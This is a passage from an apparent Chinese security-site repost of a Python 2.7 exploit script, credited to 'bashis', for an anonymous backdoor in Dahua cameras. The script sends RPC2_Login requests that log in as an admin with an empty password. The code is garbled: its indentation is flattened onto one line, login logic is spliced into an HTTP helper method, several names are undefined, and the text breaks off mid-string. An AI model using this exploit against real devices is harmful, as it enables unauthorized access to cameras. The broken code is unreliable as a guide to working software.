#!/usr/bin/python2.7 # # Dahua backdoor Generation 2 and 3 # Author: bashis March 2017 # # Credentials: No credentials needed (Anonymous) #Jacked from git history # import string import sys import socket import argparse import urllib, urllib2, httplib import base64 import ssl import json import commentjson # pip install commentjson import hashlib class HTTPconnect: def __init__(self, host, proto, verbose, creds, Raw, noexploit): self.host = host self.proto = proto self.verbose = verbose self.credentials = creds self.Raw = Raw self.noexploit = False self.noexploit = noexploit def Send(self, uri, query_headers, query_data,ID): self.uri = uri self.query_headers = query_headers self.query_data = query_data self.ID = ID # Connect-timeout in seconds timeout = 5 socket.setdefaulttimeout(timeout) url = '%s://%s%s' % (self.proto, self.host, self.uri) if self.verbose: print "[Verbose] Sending:", url if self.proto == 'https': if hasattr(ssl, '_create_unverified_context'): print "[i] Creating SSL Unverified Context" ssl._create_default_https_context = ssl._create_unverified_context if self.credentials: Basic_Auth = self.credentials.split(':') if self.verbose: print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] try: pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) except Exception as e: print "[!] Basic Auth Error:",e sys.exit(1) if self.noexploit and not self.verbose: print "[] Requesting our session ID" query_args = {"method":"global.login", "params":{ "userName":ADMIN, "password":"", "clientType":"Web3.0"}, "id":10000} URI = '/RPC2_Login' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) json_obj = json.load(response) if self.verbose: print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': ')) # # Login 2 # print "[>] Logging in" query_args = {"method":"global.login", "session":json_obj['
大华mysql异常_大华未授权访问漏洞exp | CN-SEC 中文网
最新推荐文章于 2024-02-27 11:14:55 发布